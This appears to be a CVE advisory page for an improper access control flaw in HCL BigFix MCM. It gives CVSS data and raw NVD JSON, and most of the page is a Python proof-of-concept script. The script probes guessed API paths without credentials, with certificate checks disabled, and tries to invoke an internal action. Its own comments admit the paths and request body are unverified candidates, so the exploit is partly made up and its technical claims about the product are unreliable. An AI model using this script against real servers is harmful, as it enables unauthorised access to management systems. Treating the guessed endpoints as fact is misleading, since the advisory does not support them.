Security Vulnerability Report
CVE-2025-0274 CVSS 5.3 MEDIUM

CVE-2025-0274

Published: 2025-10-16 05:15:36
Last Modified: 2025-10-21 18:21:11

Description

HCL BigFix Modern Client Management (MCM) 3.3 and earlier is affected by improper access control. Unauthorized users can access a small subset of endpoint actions, potentially allowing access to select internal functions.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
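CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L (Secondary source; the Primary assessment in the raw record below is 4.3 MEDIUM, CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N)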

Configurations (Affected Products)

cpe:2.3:a:hcltech:bigfix_mobile:*:*:*:*:*:*:*:* (versions up to and including 3.3) - VULNERABLE
cpe:2.3:a:hcltech:bigfix_modern_client_management:*:*:*:*:*:*:*:* (versions before 3.4) - VULNERABLE
HCL BigFix Modern Client Management (MCM) <= 3.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
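# CVE-2025-0274 PoC - HCL BigFix MCM Improper Access Control
# This PoC demonstrates unauthorized access to restricted endpoint actions
# Note: Replace the target URL with the actual BigFix MCM server address
#
# NOTE(review): the endpoint paths and the JSON action body used below are not
# present in the advisory data reproduced on this page; they are unverified
# candidates, so a result here is an indication to investigate, not a finding.

import json

import requests

TARGET_URL = "https://target-bigfix-mcm-server:443"


# Step 1: Attempt to access restricted endpoint actions without authentication
# The vulnerability allows unauthorized users to access a subset of endpoint actions
def exploit_access_control():
    """Check which candidate BigFix MCM paths answer a request that carries no credentials.

    Sends one unauthenticated GET to every path in ``restricted_endpoints`` and
    then one unauthenticated POST to ``/api/mcm/endpoint/actions``, printing the
    outcome of each request. Takes no arguments and returns ``None``.

    NOTE(review): the CVE record on this page carries two CVSS vectors. Only the
    Secondary one is PR:N; the Primary one is PR:L, so the record itself does not
    settle whether the flaw is reachable with no account at all.
    """
    # Common BigFix MCM API endpoints that may be affected
    restricted_endpoints = [
        "/api/mcm/endpoint/actions",
        "/api/mcm/client/management",
        "/api/mcm/admin/internal",
        "/api/sam/v1/actions",
        "/api/mcm/endpoint/list",
        "/api/mcm/internal/functions",
    ]

    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36",
        "Accept": "application/json",
        "Content-Type": "application/json",
    }

    print(f"[*] Targeting: {TARGET_URL}")
    print("[*] CVE-2025-0274 - Improper Access Control in BigFix MCM")
    print("-" * 60)

    # The context manager releases the pooled connections when the check ends;
    # the session was previously never closed.
    with requests.Session() as session:
        for endpoint in restricted_endpoints:
            url = f"{TARGET_URL}{endpoint}"
            try:
                # Attempt access without any authentication credentials.
                # verify=False turns off certificate validation, so the peer's
                # identity is not checked and urllib3 emits an
                # InsecureRequestWarning; pass a CA bundle path instead when
                # the server certificate can be validated.
                response = session.get(url, headers=headers, verify=False, timeout=10)
            except requests.exceptions.RequestException as e:
                print(f"[!] Error connecting to {endpoint}: {str(e)}")
                continue

            if response.status_code == 200:
                # NOTE(review): a 200 alone does not prove the access-control
                # flaw. Login pages, single-page-app fallbacks and reverse
                # proxies also answer 200; confirm from the response body.
                print(f"[+] VULNERABLE: {endpoint}")
                print(f" Status: {response.status_code}")
                print(f" Response preview: {response.text[:200]}")
            elif response.status_code in (401, 403):
                print(f"[-] Protected: {endpoint} (Status: {response.status_code})")
            else:
                print(f"[?] Unexpected response from {endpoint}: {response.status_code}")

        # Step 2: Attempt to invoke internal functions through accessible endpoints
        print("\n[*] Attempting to invoke internal management functions...")
        action_path = "/api/mcm/endpoint/actions"
        internal_action = {
            "action": "list_endpoints",
            "filter": {},
        }

        try:
            response = session.post(
                f"{TARGET_URL}{action_path}",
                headers=headers,
                json=internal_action,
                verify=False,  # same certificate-validation caveat as above
                timeout=10,
            )
        except requests.exceptions.RequestException as e:
            print(f"[!] Failed to invoke action: {str(e)}")
            return

        if response.status_code == 200:
            print("[+] Successfully invoked internal action without authentication!")
            try:
                body = json.dumps(response.json(), indent=2)[:500]
            except ValueError:
                # A 200 with a non-JSON body used to be reported as a failed
                # request; show the raw text so the result can be judged.
                body = response.text[:500]
            print(f" Response: {body}")
        elif response.status_code in (401, 403):
            # Previously nothing was printed here, so a patched or protected
            # server produced no output at all for this step.
            print(f"[-] Protected: {action_path} (Status: {response.status_code})")
        else:
            print(f"[?] Unexpected response from {action_path}: {response.status_code}")


if __name__ == "__main__":
    exploit_access_control()

# Mitigation:
# - Upgrade HCL BigFix MCM to version 3.4 or later
# - Refer to HCL KB0124512 for official patch information
# - Implement network segmentation to restrict access to BigFix MCM servers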

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-0274", "sourceIdentifier": "[email protected]", "published": "2025-10-16T05:15:35.713", "lastModified": "2025-10-21T18:21:10.827", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "HCL BigFix Modern Client Management (MCM) 3.3 and earlier is affected by improper access control. Unauthorized users can access a small subset of endpoint actions, potentially allowing access to select internal functions."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-306"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:hcltech:bigfix_mobile:*:*:*:*:*:*:*:*", "versionEndIncluding": "3.3", "matchCriteriaId": "97CEC651-375F-4FE8-B947-0A3D89FF0267"}, {"vulnerable": true, "criteria": "cpe:2.3:a:hcltech:bigfix_modern_client_management:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.4", "matchCriteriaId": "251EA75C-E4D9-4A13-B13D-02DFF9E6161D"}]}]}], 
"references": [{"url": "https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0124512", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}